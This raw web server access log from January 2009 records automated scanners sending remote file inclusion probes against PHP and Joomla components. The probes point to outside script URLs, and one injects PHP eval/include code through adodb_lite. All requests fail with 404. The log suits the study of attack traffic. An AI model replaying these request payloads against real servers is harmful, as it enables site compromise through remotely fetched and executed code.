207.182.137.218 - - [06/Jan/2009:04:46:39 -0800] "GET /logs/access_081205.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.thepointers.net"
66.7.216.240 - - [06/Jan/2009:04:47:17 -0800] "GET /logs/head.php?path=http://ext-group.ru/download/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.thepointers.net"
66.7.216.240 - - [06/Jan/2009:04:47:17 -0800] "GET /logs/access_081206.log/head.php?path=http://ext-group.ru/download/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.thepointers.net"
66.7.216.240 - - [06/Jan/2009:04:47:17 -0800] "GET /head.php?path=http://ext-group.ru/download/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.thepointers.net"
66.7.216.240 - - [06/Jan/2009:04:47:24 -0800] "GET /logs/access_081208.log/head.php?path=http://ext-group.ru/download/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.thepointers.net"
69.89.31.157 - - [06/Jan/2009:04:48:47 -0800] "GET /logs/senetman/html/index.php?page=http://www.geocities.com/xzfru/perl/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
69.89.31.157 - - [06/Jan/2009:04:48:47 -0800] "GET /senetman/html/index.php?page=http://www.geocities.com/xzfru/perl/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
69.89.31.157 - - [06/Jan/2009:04:48:47 -0800] "GET /logs/access_080927.log/senetman/html/index.php?page=http://www.geocities.com/xzfru/perl/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:50:06 -0800] "GET /logs/access_081208.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:50:07 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:50:08 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:50:08 -0800] "GET /logs/access_081208.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:50:09 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:50:09 -0800] "GET /logs/access_081208.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:50:10 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:50:10 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:50:11 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:53:23 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:53:24 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:53:24 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:53:34 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:53:34 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:53:35 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
69.72.187.58 - - [06/Jan/2009:04:54:35 -0800] "GET /logs/access_081206.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
69.72.187.58 - - [06/Jan/2009:04:54:35 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
69.72.187.58 - - [06/Jan/2009:04:54:35 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
64.118.85.149 - - [06/Jan/2009:04:55:37 -0800] "GET /logs/access_081206.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
64.118.85.149 - - [06/Jan/2009:04:55:37 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
64.118.85.149 - - [06/Jan/2009:04:55:37 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:04:55:55 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:04:55:55 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:04:55:55 -0800] "GET /logs/access_081206.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
213.226.166.122 - - [06/Jan/2009:04:57:44 -0800] "GET /logs/access.log//inc/header.php/step_one.php?server_inc=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "thepointers.net"
213.226.166.122 - - [06/Jan/2009:04:57:46 -0800] "GET /inc/header.php/step_one.php?server_inc=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "thepointers.net"
213.226.166.122 - - [06/Jan/2009:04:57:51 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "thepointers.net"
213.226.166.122 - - [06/Jan/2009:04:59:45 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:59:47 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:59:48 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:04:59:48 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
200.160.96.54 - - [06/Jan/2009:05:00:14 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://secure.burtonhosting.com/billing//include/reports/include/rofile.txt?? HTTP/1.0" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.thepointers.net"
200.160.96.54 - - [06/Jan/2009:05:00:17 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://secure.burtonhosting.com/billing//include/reports/include/rofile.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.thepointers.net"
200.160.96.54 - - [06/Jan/2009:05:00:19 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://secure.burtonhosting.com/billing//include/reports/include/rofile.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.thepointers.net"
213.226.166.122 - - [06/Jan/2009:05:00:29 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "thepointers.net"
65.17.253.110 - - [06/Jan/2009:05:01:40 -0800] "GET /add.php?APB_rp=http://www.keesingfightfraud.com/site/media/ide.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "thepointers.net"
65.17.253.110 - - [06/Jan/2009:05:02:14 -0800] "GET /logs/access.log/add.php?APB_rp=http://www.keesingfightfraud.com/site/media/ide.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "thepointers.net"
65.17.253.110 - - [06/Jan/2009:05:02:14 -0800] "GET /add.php?APB_rp=http://www.keesingfightfraud.com/site/media/ide.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "thepointers.net"
65.17.253.110 - - [06/Jan/2009:05:02:14 -0800] "GET /logs/add.php?APB_rp=http://www.keesingfightfraud.com/site/media/ide.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "thepointers.net"
66.172.9.3 - - [06/Jan/2009:05:02:33 -0800] "GET /logs/access_081206.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.thepointers.net"
66.172.9.3 - - [06/Jan/2009:05:02:33 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.thepointers.net"
66.172.9.3 - - [06/Jan/2009:05:02:34 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:05:03:03 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
69.72.187.58 - - [06/Jan/2009:05:03:47 -0800] "GET /logs/access_081208.log/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
69.72.187.58 - - [06/Jan/2009:05:03:47 -0800] "GET /logs/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
69.72.187.58 - - [06/Jan/2009:05:03:47 -0800] "GET /index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
64.118.85.149 - - [06/Jan/2009:05:03:49 -0800] "GET /logs/access_081208.log/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
64.118.85.149 - - [06/Jan/2009:05:03:49 -0800] "GET /index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
64.118.85.149 - - [06/Jan/2009:05:03:49 -0800] "GET /logs/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:05:04:13 -0800] "GET /logs/access_081206.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:05:04:13 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
194.135.103.242 - - [06/Jan/2009:05:04:14 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:04:35 -0800] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:04:35 -0800] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:04:36 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:04:36 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:04:36 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:04:37 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
216.55.140.43 - - [06/Jan/2009:05:04:51 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "thepointers.net"
216.55.140.43 - - [06/Jan/2009:05:04:51 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "thepointers.net"
216.55.140.43 - - [06/Jan/2009:05:04:51 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "thepointers.net"
209.44.121.2 - - [06/Jan/2009:05:05:07 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "thepointers.net"
209.44.121.2 - - [06/Jan/2009:05:05:07 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "thepointers.net"
209.44.121.2 - - [06/Jan/2009:05:05:07 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:06:00 -0800] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:06:01 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
218.234.18.127 - - [06/Jan/2009:05:06:02 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "thepointers.net"
209.44.121.2 - - [06/Jan/2009:05:06:10 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.thepointers.net"
209.44.121.2 - - [06/Jan/2009:05:06:10 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.thepointers.net"
209.44.121.2 - - [06/Jan/2009:05:06:10 -0800] "GET /logs/access_081208.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:05:06:31 -0800] "GET /logs/access_081208.log/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:05:06:31 -0800] "GET /index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
72.52.215.115 - - [06/Jan/2009:05:06:31 -0800] "GET /logs/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.thepointers.net"
216.55.140.43 - - [06/Jan/2009:05:06:38 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.thepointers.net"
216.55.140.43 - - [06/Jan/2009:05:06:38 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.thepointers.net"
216.55.140.43 - - [06/Jan/2009:05:06:38 -0800] "GET /logs/access_081208.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.thepointers.net"
66.172.9.3 - - [06/Jan/2009:05:07:12 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.thepointers.net"
213.91.246.64 - - [06/Jan/2009:05:07:29 -0800] "GET /logs/access.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "thepointers.net"
213.91.246.64 - - [06/Jan/2009:05:07:29 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "thepointers.net"
213.91.246.64 - - [06/Jan/2009:05:07:31 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "thepointers.net"
213.91.246.64 - - [06/Jan/2009:05:09:44 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.thepointers.net"
213.91.246.64 - - [06/Jan/2009:05:09:45 -0800] "GET /logs/access_081208.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.thepointers.net"
213.91.246.64 - - [06/Jan/2009:05:09:45 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/bot/bit.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.thepointers.net"
67.18.151.242 - - [06/Jan/2009:05:09:47 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
69.72.187.58 - - [06/Jan/2009:05:10:20 -0800] "GET /logs/access_081006.log/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.thepointers.net"
66.7.216.240 - - [06/Jan/2009:05:10:48 -0800] "GET /logs/access_081206.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.thepointers.net"
66.7.216.240 - - [06/Jan/2009:05:10:48 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.thepointers.net"
66.7.216.240 - - [06/Jan/2009:05:10:48 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.thepointers.net"
64.118.85.149 - - [06/Jan/2009:05:11:12 -0800] "GET /logs/access_081006.log/index.php?option=com_joom12pic&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.thepointers.net"
69.94.45.22 - - [06/Jan/2009:05:11:23 -0800] "GET /logs/access_081206.log/appserv/main.phphttp://www.topspeedracer.com/mambots/editors-xtd/z6id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
69.94.45.22 - - [06/Jan/2009:05:11:23 -0800] "GET /appserv/main.phphttp://www.topspeedracer.com/mambots/editors-xtd/z6id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
69.94.45.22 - - [06/Jan/2009:05:11:23 -0800] "GET /logs/appserv/main.phphttp://www.topspeedracer.com/mambots/editors-xtd/z6id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.thepointers.net"
66.7.216.240 - - [06/Jan/2009:05:12:04 -0800] "GET /logs/access_081206.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.thepointers.net"
66.7.216.240 - - [06/Jan/2009:05:12:04 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.thepointers.net"
